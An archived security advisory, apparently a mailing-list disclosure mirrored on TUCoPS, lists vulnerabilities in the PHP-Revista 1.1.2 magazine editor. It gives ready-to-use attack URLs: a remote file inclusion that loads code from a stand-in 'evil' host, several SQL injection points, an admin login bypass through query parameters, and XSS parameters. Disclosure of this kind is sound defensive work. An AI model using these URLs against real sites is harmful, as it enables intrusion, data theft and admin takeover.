TUCoPS :: Web :: PHP :: b06-4542.htm

PHP-Revista Multiple vulnerabilities
PHP-Revista Multiple vulnerabilities
PHP-Revista Multiple vulnerabilities


Discovered by Sirdarckcat from elhacker.net=0D
------------------------------------------------------------------------------------=0D
=0D
Revista 1.1.2=0D
http://php-revista.sourceforge.org=0D 
=0D
------------------------------------------------------------------------------------=0D
=0D
Revista is a simple spanish PHP magazine editor.=0D
It was done by php.org.mx=0D
=0D
It suffers of multiple vulnerabilities.=0D
=0D
------------------------------------------------------------------------------------=0D
=0D
Remote File Inclusion=0D
=0D
http://revista/estilo/[ANY STYLE]/index.php?adodb=http://evil/script=0D 
=0D
------------------------------------------------------------------------------------=0D
=0D
SQLi=0D
=0D
http://revista/estilo/[ANY STYLE]/busqueda_tema.php?id_temas=-1+[SQL]=0D 
=0D
http://revista/estilo/[ANY STYLE]/busqueda.php?cadena='+[SQL]=0D 
=0D
http://revista/estilo/[ANY STYLE]/autor.php?id_autor=-1+[SQL]=0D 
=0D
http://revista/estilo/[ANY STYLE]/lista.php?email='+[SQL]=0D 
=0D
http://revista/estilo/[ANY STYLE]/articulo.php?id_articulo=-1+[SQL]=0D 
=0D
------------------------------------------------------------------------------------=0D
=0D
Credentials Bypass=0D
=0D
http://revista/admin/index.php?ID_ADMIN=1&SUPER_ADMIN=1=0D 
=0D
------------------------------------------------------------------------------------=0D
=0D
XSS=0D
=0D
http://revista/estilo/[ANY STYLE]/busqueda.php?cadena==0D 
=0D
http://revista/estilo/[ANY STYLE]/lista.php?email==0D 
=0D
------------------------------------------------------------------------------------=0D
=0D
Att.=0D
Sirdarckcat=0D
elhacker.net

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH